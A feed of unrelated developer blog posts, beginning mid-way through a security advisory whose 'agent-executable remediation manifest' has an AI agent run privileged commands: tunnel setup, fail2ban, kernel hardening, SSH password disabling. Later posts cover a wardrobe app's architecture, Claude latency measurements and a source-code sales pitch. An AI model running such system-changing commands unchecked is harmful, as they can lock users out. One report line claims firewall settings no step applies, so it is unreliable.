ASK_USER: "What domain do you want to use for accessing the agent?
(e.g., agent.yourdomain.com)"
IF PLATFORM=linux:
Run: curl -fsSL https://pkg.cloudflare.com/cloudflare-main.gpg \
| sudo gpg --dearmor -o /usr/share/keyrings/cloudflare.gpg
Run: echo "deb [signed-by=/usr/share/keyrings/cloudflare.gpg] \
https://pkg.cloudflare.com/cloudflared $(lsb_release -cs) main" \
| sudo tee /etc/apt/sources.list.d/cloudflared.list
Run: sudo apt update && sudo apt install -y cloudflared
IF PLATFORM=macos:
Run: brew install cloudflare/cloudflare/cloudflared
Run: cloudflared tunnel login
Run: cloudflared tunnel create agent-tunnel
Write config.yml:
tunnel: [tunnel-id]
credentials-file: /root/.cloudflared/[tunnel-id].json
ingress:
- hostname: [user-provided domain]
service: http://localhost:[detected port]
- service: http_status:404
Run: cloudflared tunnel route dns agent-tunnel [user-provided domain]
Run: cloudflared tunnel run agent-tunnel
REPORT: "Tunnel created. Agent accessible at https://[domain].
No inbound ports required."
---
### Step 5: Harden the host
IF PLATFORM=linux:
Run: sudo apt install -y fail2ban
Run: sudo systemctl enable fail2ban
Write /etc/sysctl.d/99-agent-hardening.conf:
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_redirects = 0
kernel.randomize_va_space = 2
net.ipv4.conf.all.log_martians = 1
Run: sudo sysctl --system
Run: sudo apt install -y unattended-upgrades
Run: sudo dpkg-reconfigure -plow unattended-upgrades
REPORT: "Host hardened: fail2ban active, kernel parameters set,
automatic security updates enabled."
IF PLATFORM=macos:
Run: sudo fdesetup status
IF FileVault is off:
REPORT: "FileVault (disk encryption) is disabled."
ASK_USER: "Enable FileVault? This encrypts your entire disk.
Requires restart. (yes/no)"
IF yes: Run: sudo fdesetup enable
Run: sudo softwareupdate --schedule on
REPORT: "macOS hardened: firewall active, stealth mode on,
automatic updates enabled."
---
### Step 6: Disable SSH password authentication
IF PLATFORM=linux:
Run: grep -E '^PasswordAuthentication' /etc/ssh/sshd_config
IF set to yes:
Run: sudo sed -i 's/^PasswordAuthentication yes/PasswordAuthentication no/' \
/etc/ssh/sshd_config
Run: sudo systemctl restart sshd
REPORT: "SSH password authentication disabled. Key-only access."
IF PLATFORM=macos:
Run: sudo systemsetup -getremotelogin
IF Remote Login is on:
ASK_USER: "SSH is enabled. Do you need remote SSH access to this
machine? (yes/no)"
IF no:
Run: sudo systemsetup -setremotelogin off
REPORT: "SSH disabled entirely."
IF yes:
Run: sudo sed -i '' 's/^#PasswordAuthentication yes/PasswordAuthentication no/' \
/etc/ssh/sshd_config
Run: sudo launchctl stop com.openssh.sshd
Run: sudo launchctl start com.openssh.sshd
REPORT: "SSH password authentication disabled. Key-only access."
---
### Step 7: Verify remediation
IF PLATFORM=linux:
Run: ss -tlnp | grep -E ':(4096|3000|8080|8888) '
Run: sudo ufw status verbose
Run: systemctl is-active fail2ban
IF PLATFORM=macos:
Run: lsof -i -P | grep -E ':(4096|3000|8080|8888) .*(LISTEN)'
Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
Run: sudo fdesetup status
REPORT: "Remediation complete. Summary:"
REPORT: "- Agent bind address: [current binding]"
REPORT: "- Firewall: [status]"
REPORT: "- SSH hardening: [status]"
REPORT: "- Host hardening: [status]"
REPORT: "- Tunnel: [configured/not configured]"
REPORT: "- Disk encryption: [status, macOS only]"
---
### What this manifest does NOT cover (requires manual review)
- Layer 2 (Zero Trust Access): Requires Cloudflare dashboard configuration
for identity provider integration. See the full article for policy setup.
- Layer 5 (MCP permission scoping): Requires agent-specific configuration
based on your tool chain. See the full article for examples.
- Supply chain audit: Review installed packages manually.
Run: pip list / npm list -g / cargo install --list
- Credential rotation: If your agent was exposed, assume all environment
variables, SSH keys, and API tokens accessible to the agent process are
compromised. Rotate them.
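For the pip side of that supply-chain audit, here is a minimal Python sketch that compares installed distributions against a list of known-bad releases. The version pin below is the one named in this advisory; treat the dict as illustrative and maintain your own list from a real vulnerability feed.

```python
from importlib.metadata import distributions

# Known-bad releases named in this advisory; maintain your own list from a
# real vulnerability feed -- this dict is illustrative, not exhaustive.
COMPROMISED = {
    "litellm": {"1.82.8"},
}

def match_compromised(installed, compromised=COMPROMISED):
    """Pure check: `installed` is an iterable of (name, version) pairs."""
    return [(name, ver) for name, ver in installed
            if ver in compromised.get(name.lower(), set())]

def audit_environment():
    """Scan the current Python environment for known-bad releases."""
    installed = [(d.metadata["Name"] or "", d.version) for d in distributions()]
    return match_compromised(installed)

if __name__ == "__main__":
    for name, ver in audit_environment():
        print(f"WARNING: {name}=={ver} matches a known-compromised release")
```

Run it inside each virtualenv your agent uses; a clean result only means no *known* bad pin is present, not that the environment is safe.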
This is the first security advisory we've published with an agent-executable remediation manifest. We believe every security disclosure that tells developers what to do should let their tools do it for them. We'll be publishing these with every advisory going forward.
We built FORGE because we were setting up AI coding agent infrastructure for clients and kept solving the same security problems from scratch — every time. Cloudflare Tunnel configuration. Zero Trust access policies. WebSocket cookie conflicts. Kernel hardening. MCP server scoping. The same 1,000 lines of battle-tested bash with rollback on failure.
FORGE implements all five layers described in this article as a single deployment script. One command. Under 10 minutes. The agent runs on your VPS, behind your tunnel, gated by your identity, hardened to CIS baselines, with MCP servers pre-configured and scoped.
It is not a hosted service. You own the server. You own the code. You own the infrastructure. The $47 Developer Edition buys the architecture, security model, and deployment automation. Your VPS costs about $7/month. There is no recurring fee to us.
We built it because the gap between "start the server" and "run the server securely" should not require 1,000 lines of infrastructure automation that every developer has to figure out from scratch. FORGE closes that gap.
Hodge Luke is the founder of Hodge Luke Digital Intelligence Agency and the creator of FORGE — a security-hardened deployment platform for AI coding agents built on Cloudflare's edge network. FORGE implements the 5-layer defense-in-depth model described in this article as a one-command deployment.
Hodge Luke | Two Guys and some Bots | forge.useacceda.com
2026-03-31 06:28:14
Solo dev, no funding, one app that needed to work offline and think online. Why the architecture ended up the way it did.
I spent the last several months building an AI-powered wardrobe app called Outfii. No cofounders, no funding, no team. Just me, too much chai, and a mass of decisions I wasn't qualified to make.
You photograph your clothes, the app organizes them, and AI helps you figure out what to wear. It's on Google Play now. Here's how it actually went.
Every morning, same thing. Full closet, nothing to wear. I looked it up and apparently most people regularly use about 20% of what they own. The rest just hangs there.
I don't have a fashion background. But "help me combine clothes I already own" felt like something code could handle. Whether I was the right person to build it is still an open question.
This is the part that shaped every other decision.
Some things need to happen instantly. When you're flipping through outfit options, you can't be waiting on a server to tell you whether navy and olive work together. That feedback loop needs to be under 50ms or it feels broken.
Other things need actual intelligence. Looking at a photo and figuring out "that's a linen shirt, it's dusty rose, semi-formal" requires a vision model. Suggesting what to wear tomorrow based on your wardrobe, the weather, and what you wore this week requires an LLM.
So the app has two brains. One lives on your phone. One lives in the cloud. They do completely different jobs.
The on-device brain handles color analysis, harmony scoring, and outfit compatibility. I tried doing this in Dart first. It was too slow. Color distance calculations in tight loops, converting between color spaces, running harmony checks across every item pair in a wardrobe. Dart isolates helped but added complexity without solving the core problem: CPU-bound math needs compiled code. I rewrote it in Rust, bridged to Flutter via flutter_rust_bridge. Scoring now runs in ~20-30ms on a mid-range Android phone. The Rust binary adds about 4MB to the APK, which felt worth it.
The scoring algorithm itself went through three complete rewrites. Telling navy from black programmatically is genuinely hard. CIE Delta E gets you close, but perceptual color difference is still messy at the dark end of the spectrum. Your eyes handle this effortlessly. Code does not.
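To make the navy-vs-black problem concrete, here is a textbook CIE76 Delta E sketch in Python (sRGB → linear → XYZ → Lab, then Euclidean distance). Outfii's actual engine is Rust and uses more than this; the point is only to show how compressed the dark end of the space is.

```python
import math

def _srgb_to_linear(c):
    c /= 255.0
    return c / 12.92 if c <= 0.04045 else ((c + 0.055) / 1.055) ** 2.4

def _f(t):
    d = 6 / 29
    return t ** (1 / 3) if t > d ** 3 else t / (3 * d * d) + 4 / 29

def rgb_to_lab(rgb):
    """sRGB (0-255 per channel) -> CIELAB under a D65 white point."""
    r, g, b = (_srgb_to_linear(c) for c in rgb)
    x = 0.4124 * r + 0.3576 * g + 0.1805 * b
    y = 0.2126 * r + 0.7152 * g + 0.0722 * b
    z = 0.0193 * r + 0.1192 * g + 0.9505 * b
    fx, fy, fz = _f(x / 0.95047), _f(y), _f(z / 1.08883)
    return (116 * fy - 16, 500 * (fx - fy), 200 * (fy - fz))

def delta_e_76(rgb1, rgb2):
    """CIE76: plain Euclidean distance in Lab space."""
    return math.dist(rgb_to_lab(rgb1), rgb_to_lab(rgb2))

# Two dark pixels a camera might plausibly produce for navy and black fabric:
dark_navy, near_black = (18, 20, 38), (16, 16, 20)
```

The distance between those two dark swatches is a small fraction of the distance between nominal navy `(0, 0, 128)` and olive `(128, 128, 0)`, which is exactly the dark-end ambiguity described above.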
The cloud brain handles understanding. When you scan a clothing item, an edge function sends the photo to a vision model that identifies type, color, pattern, material. When you ask for outfit suggestions, another function builds context from your wardrobe and passes it to an LLM. Different tasks, different models. Cloud response times vary (2-8 seconds depending on the model and task), which is fine because these aren't real-time interactions.
The two never overlap. Scoring is always local. Understanding is always cloud. This means the core app works offline, which matters a lot in India where connectivity is unpredictable.
AI features cost money to run. I'm bootstrapped. Subsidizing API calls for every user isn't sustainable.
So I built a bring-your-own-key system. Users can plug in their own OpenAI or Anthropic API key and get the full AI experience without paying me a subscription. Keys are encrypted on the phone and never touch our servers in plaintext. There are also paid tiers for people who don't want to think about API keys.
This was controversial in my head for a while. "Asking users to get their own API key" sounds like terrible UX. But it turns out there's a niche of technical users who actually prefer this. They like knowing exactly what model runs, what it costs, and that their data goes to the provider they chose. It's not for everyone, but it's a real segment.
The wardrobe is stored locally in SQLite. Not as a cache. As the source of truth.
I didn't want the app to break when you lose signal. You should be able to browse your wardrobe, check outfit history, and get scoring results in airplane mode. Cloud sync happens in the background when you're online.
The downside is sync conflicts. Two devices editing the same wardrobe creates problems I'm still working through. Last-write-wins is what I ship with for now, but it's not great when someone adds items on a tablet and a phone simultaneously. Solving this properly is on the list.
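Last-write-wins itself is tiny, which is both its appeal and its problem. A sketch of the per-item merge (illustrative only, not Outfii's actual sync code):

```python
def lww_merge(local, remote):
    """Per-item last-write-wins: each state maps item_id -> (updated_at, data).

    Whichever copy carries the newer timestamp wins for that item; the older
    concurrent edit is silently dropped, which is exactly the failure mode
    described above.
    """
    merged = dict(local)
    for item_id, (ts, data) in remote.items():
        if item_id not in merged or ts > merged[item_id][0]:
            merged[item_id] = (ts, data)
    return merged
```

With a tablet edit at t=5 and a phone edit at t=6 to the same item, the phone wins in either merge direction and the tablet's change is simply gone.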
I shipped too many features at launch. Wardrobe management, AI outfits, weather integration, trip packing, laundry tracking, wear reminders, style profiles. That's three apps pretending to be one. Should've shipped wardrobe + AI outfits and added the rest over time.
My Play Store screenshots were raw app captures. Status bars visible. Timestamps. Battery icons. No marketing framing. People decide whether to install your app in about two seconds of scrolling, and I gave them nothing to work with. Still fixing this weeks later.
Debugging across the Rust bridge was also painful early on. When something panics in Rust, the error you get on the Flutter side is not always helpful. I spent a full day on a crash that turned out to be a type mismatch in the FFI layer that codegen silently accepted. Added a lot of defensive logging after that.
I also copy-pasted boilerplate across backend functions for months before building a shared utilities layer. Auth middleware, response helpers, error formatting, all duplicated. Embarrassing but honest.
The blog was a good early bet. I wrote about color theory in fashion, capsule wardrobe math, pattern mixing rules. Technical content at the intersection of fashion and algorithms. Five posts, bringing in organic search traffic before anyone even downloads the app.
The on-device scoring engine was painful to set up but it's a genuine differentiator. Most wardrobe apps send every request to a server. Having instant, offline scoring on a 29MB app feels noticeably better. Users don't know it's Rust running on their phone. They just know it's fast.
Social features are rolling out. Users can share outfit combinations. After that, iOS and a web app.
The developer account is under Clarixo, my parent brand. Outfii is the first product. Bootstrapped, planning to stay that way.
If you want to try it: outfii.in
Play Store: Outfii - AI Wardrobe Stylist
If you're building solo, optimize for decisions you can live with for a while. The architecture won't be perfect. Ship the version that's good enough, then fix the parts that actually hurt.
2026-03-31 06:21:51
Claude has a real speed problem for our team — but mostly in TTFT, not in raw decoding speed.
I measured our actual usage, and the short version is: decode speed was mostly fine, but time to first token (TTFT) had a multi-second median and a brutal tail.
That explains the feeling: Claude often isn’t that slow once it starts, but sometimes it takes so long to begin that the whole thing feels like it’s crawling.
That naturally raises the next question:
Should we move the team to self-hosted open-weight models?
At first glance, that sounds promising. Self-hosted setups can have dramatically better TTFT. In the numbers I looked at, open-weight deployments were often estimated around 150–600ms TTFT, versus Claude’s 4–7s median in our real usage.
But once I looked at the actual team setup — 10 engineers sharing one GPU budget — the answer stopped looking obvious.
The best open-weight models need serious multi-GPU infra, and once that infra is shared, the speed case starts looking surprisingly shaky.
So this post is not “open source bad.”
It’s a narrower question:
If Claude feels slow, is moving a team to open-weight models on shared infra actually the answer?
Right now, I’m not convinced.
This started with a very practical complaint:
Claude is slow.
That could mean a lot of things, so I measured it.
From about 50 session files and roughly 3,000 API calls, the problem was clear: TTFT, especially in the tail.
| Trigger | p10 | p50 | p90 |
|---|---|---|---|
| User message | 2.8s | 6.8s | 28.1s |
| Tool result | 2.5s | 4.2s | 14.5s |
That 28.1s p90 is the whole story.
Claude is not just “a bit laggy” there. It’s slow enough to break flow.
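For anyone wanting to reproduce this kind of table, the bookkeeping is small. A sketch assuming each logged call carries a `trigger` label and a `ttft_s` float (a hypothetical log schema, not Anthropic's API shape):

```python
def percentile(values, p):
    """Linear-interpolation percentile (0 <= p <= 100)."""
    vs = sorted(values)
    k = (len(vs) - 1) * p / 100
    lo = int(k)
    hi = min(lo + 1, len(vs) - 1)
    return vs[lo] + (vs[hi] - vs[lo]) * (k - lo)

def ttft_stats(events):
    """Group logged calls by trigger and summarize TTFT at p10/p50/p90."""
    by_trigger = {}
    for e in events:
        by_trigger.setdefault(e["trigger"], []).append(e["ttft_s"])
    return {t: {p: round(percentile(v, p), 2) for p in (10, 50, 90)}
            for t, v in by_trigger.items()}
```

The tail is the part worth plotting, not just tabulating: a p90 this far from the median means the bad experiences are rare but memorable.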
Here’s the other half of the picture.
| Metric | p10 | p50 | p90 |
|---|---|---|---|
| Decode tok/s (excluding TTFT) | 72 | 178 | 567 |
| Wall tok/s (including TTFT) | 23 | 41 | 63 |
And per model:
| Model | TTFT p50 | Decode p50 |
|---|---|---|
| Haiku 4.5 | 1.8s | 287 tok/s |
| Sonnet 4.6 | 4.2s | 176 tok/s |
| Opus 4.6 | 4.7s | 130 tok/s |
So the core problem wasn’t really:
Claude can’t stream fast enough.
It was:
Claude often takes too long to get started.
That distinction matters, because it makes self-hosting sound much more attractive than it might actually be.
If TTFT is the problem, then self-hosting sounds like the clean fix.
The pitch is simple: run an open-weight model on GPUs you control, and the multi-second TTFT drops to a few hundred milliseconds.
And the numbers I collected from the self-hosting side were definitely seductive.
| Metric | Claude now | Best self-hosted |
|---|---|---|
| Tool-triggered TTFT p50 | 4,200ms | ~160ms |
| User-triggered TTFT p50 | 6,800ms | ~160ms |
| Bad-day p90 | 14,500ms+ | <400ms |
If TTFT were the only thing that mattered, I think this would already be enough to move seriously toward GPUs.
But TTFT is not the whole developer experience.
We’re not talking about toy models here. We’re talking about the real open-weight candidates people would actually put on the table.
| Model | Why consider it? |
|---|---|
| Qwen3-Coder-Next | Fast MoE coding model, 80B total / 3B active |
| MiniMax M2.5 | Stronger quality candidate, 230B total / 10B active |
| DeepSeek V3.2 | Very large MoE option |
| Qwen3.5-27B | Dense, simpler, slower but cheaper |
And the inference engines are the standard ones you’d expect:
| Model family | Realistic inference engine |
|---|---|
| Qwen / DeepSeek | vLLM or SGLang |
| MiniMax M2.5 | vLLM |
| Dense smaller models | usually vLLM |
That means this isn’t some hypothetical future stack. It’s the standard modern self-hosted inference path.
This is the piece I think gets hand-waved away too often.
Our current setup is:
| Item | Value |
|---|---|
| Engineers | 10 |
| Claude subscription per engineer | $150/mo |
| Total Claude cost | $1,500/mo |
The budget I was willing to entertain for self-hosting was roughly 3× that, so about $4,500/month.
That sounds like a lot.
But for top open-weight coding models, it buys you something like this:
| Config | Cost/month | Notes |
|---|---|---|
| 5× H100 on Vast.ai | $4,712 | Enough for MiniMax M2.5 / DeepSeek-class INT4 |
| 3× H100 on Lambda | $4,521 | More reliable, lower GPU count |
| 4× H200 on Vast.ai | $4,153 | Better memory bandwidth |
| 8× A100 on Vast.ai | $2,580 | Cheapest high-count option |
That’s not “10 engineers each get a fast private model.”
That’s one shared cluster.
And that changes the question completely.
The right equation is not:
lower TTFT = faster experience
It’s more like:
team step time = queueing + TTFT + output_tokens / decode_speed
That’s the part that made me hesitate.
Because once you share one cluster across 10 engineers, requests queue behind each other, decode throughput is split across concurrent sessions, and the tail latency you were trying to escape can creep back in.
That is a very different situation from “look how fast this benchmark is on one box.”
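That equation can be made concrete with a back-of-the-envelope model. The inputs below are illustrative, and the even-split assumption is pessimistic (real batched serving shares throughput better than a linear split), but it shows the shape of the trade-off:

```python
def perceived_step_s(queue_wait_s, ttft_s, output_tokens,
                     cluster_tok_s, active_sessions):
    """Rough per-engineer step time on a shared cluster.

    Assumes aggregate decode throughput is split evenly across active
    sessions -- a simplification, but enough to separate "benchmark speed
    on one box" from "speed one engineer actually feels".
    """
    per_session_tok_s = cluster_tok_s / max(active_sessions, 1)
    return queue_wait_s + ttft_s + output_tokens / per_session_tok_s

# Claude today: no queue, 4.2s TTFT, ~176 tok/s of dedicated decode
claude = perceived_step_s(0.0, 4.2, 880, 176, 1)
# Shared cluster: fast TTFT, 2,000 tok/s aggregate, 5 engineers decoding at once
shared = perceived_step_s(0.0, 0.16, 880, 2000, 5)
```

With these particular inputs the shared cluster still wins, but double the concurrency or add real queueing and the gap narrows fast. That is the "aggregate numbers vs. what one engineer feels" distinction in miniature.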
The self-hosted numbers I gathered looked like this:
| Model | Config | INT4 decode tok/s |
|---|---|---|
| Qwen3-Coder-Next | 2× H100 | ~3,400 |
| MiniMax M2.5 | 4× H100 | ~2,000 |
| MiniMax M2.5 | 2× H100 | ~1,000 |
| DeepSeek V3.2 | 5× H100 | ~700 |
| Qwen3.5-27B | 2× H100 | ~380 |
| Qwen3.5-27B | 1× H100 | ~190 |
Those numbers are exciting. They make open weights look like a no-brainer.
But they also raise exactly the question I still don’t think I’ve answered cleanly:
Are these the numbers one engineer feels, or the numbers a shared cluster produces in aggregate?
Because for a 10-person team, those are not the same thing.
And once I started looking at the problem through the lens of shared infra, the speed case stopped looking like an obvious slam dunk.
I think I’ve convinced myself of a few things:
| Statement | My current view |
|---|---|
| Claude has a real speed problem | Yes |
| The problem is mostly TTFT | Yes |
| Self-hosting probably improves TTFT a lot | Yes |
| The best open-weight models are expensive to run well | Yes |
| Shared infra weakens the speed story | Yes |
| Moving the whole team looks obviously promising | No |
That’s the interesting part.
The story I expected was:
Claude is slow, open weights are fast, buy GPUs, problem solved.
The story I actually found was:
Claude is slow mostly because of TTFT.
Open weights probably help that.
But once the infra is shared across a team, the speed case gets much less clean.
I started with a very simple frustration:
Claude felt slow.
I measured it and found a very specific issue:
TTFT, especially the p90 tail, was bad enough to make the whole experience feel like it was crawling.
That led to the obvious next idea:
What if we just move to open-weight models on our own GPUs?
And right now, my answer is not “definitely no.”
It’s this:
Open-weight models look promising for TTFT.
They look much less promising as a shared-infra speed fix for a whole team.
That’s the question I’m left with.
Not whether open weights are good.
Not whether they’re possible.
But whether they really solve the problem we actually have.
2026-03-31 06:20:01
Hey DEV community! 👋
For the past few weeks, I've been building something that solves a complex real-world problem: a complete "SaaS-in-a-box" bus reservation platform called Ani Travels.
My main challenge was handling concurrency—making sure two people looking at the same open seat cannot book it simultaneously.
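The post doesn't show the implementation, but the standard fix for this race is to make the seat claim a single conditional UPDATE inside a transaction, so exactly one of two racing bookings succeeds. A generic sketch with Python and SQLite (Ani Travels' real schema isn't public, so the table and column names here are invented):

```python
import sqlite3

def book_seat(conn, seat_id, user_id):
    """Claim a seat with a single conditional UPDATE.

    The UPDATE only matches while the seat is still 'open', so of two
    racing bookings exactly one sees rowcount == 1; the loser gets False
    and can be told the seat was just taken.
    """
    with conn:  # one transaction per attempt
        cur = conn.execute(
            "UPDATE seats SET status = 'booked', booked_by = ? "
            "WHERE id = ? AND status = 'open'",
            (user_id, seat_id),
        )
        return cur.rowcount == 1  # False -> someone else won the race
```

The same pattern works with `SELECT ... FOR UPDATE` row locks in Postgres or MySQL when you need to hold a seat through a multi-step checkout.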
You can play around with the Live Demo here:
🔗 https://ani-travels-bus-booking.vercel.app
(Since the backend is on Render free tier, please excuse the initial 50-second cold start!)
I am selling the Complete Source Code along with detailed setup instructions if any entrepreneur or dev wants to skip 100+ hours of coding and launch their own startup/project immediately. It comes with seed scripts to populate the DB instantly.
👉 Get the Full Source Code from my Gumroad
Would love to hear constructive feedback! How do you handle complex booking architectures in your apps?